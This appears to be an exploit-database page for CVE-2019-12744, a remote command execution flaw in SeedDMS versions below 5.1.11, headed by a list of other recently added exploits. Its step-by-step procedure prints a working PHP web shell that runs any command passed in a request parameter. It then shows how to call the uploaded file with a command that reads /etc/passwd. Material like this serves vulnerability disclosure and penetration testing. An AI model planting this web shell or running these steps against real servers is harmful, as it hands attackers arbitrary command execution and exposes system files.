97334ae3af
9 changes to exploits/shellcodes GSearch 1.0.1.0 - Denial of Service (PoC) Microsoft Windows - 'CmpAddRemoveContainerToCLFSLog' Arbitrary File/Directory Creation Microsoft Windows Font Cache Service - Insecure Sections Privilege Escalation dotProject 2.1.9 - SQL Injection SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting SeedDMS versions < 5.1.11 - Remote Command Execution GrandNode 4.40 - Path Traversal / Arbitrary File Download Linux/x86_64 - Reverse(0.0.0.0:4444/TCP) Shell (/bin/sh) Shellcode
32 lines
No EOL
1.1 KiB
Text
32 lines
No EOL
1.1 KiB
Text
# Exploit Title: [Remote Command Execution through Unvalidated File Upload in SeedDMS versions <5.1.11]
|
|
# Google Dork: [NA]
|
|
# Date: [20-June-2019]
|
|
# Exploit Author: [Nimit Jain](https://www.linkedin.com/in/nimitiitk)(https://secfolks.blogspot.com)
|
|
# Vendor Homepage: [https://www.seeddms.org]
|
|
# Software Link: [https://sourceforge.net/projects/seeddms/files/]
|
|
# Version: [SeedDMS versions <5.1.11] (REQUIRED)
|
|
# Tested on: [NA]
|
|
# CVE : [CVE-2019-12744]
|
|
|
|
Exploit Steps:
|
|
|
|
Step 1: Login to the application and under any folder add a document.
|
|
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.
|
|
|
|
PHP Backdoor Code:
|
|
<?php
|
|
|
|
if(isset($_REQUEST['cmd'])){
|
|
echo "<pre>";
|
|
$cmd = ($_REQUEST['cmd']);
|
|
system($cmd);
|
|
echo "</pre>";
|
|
die;
|
|
}
|
|
|
|
?>
|
|
|
|
Step 3: Now after uploading the file check the document id corresponding to the document.
|
|
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.
|
|
|
|
Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved. |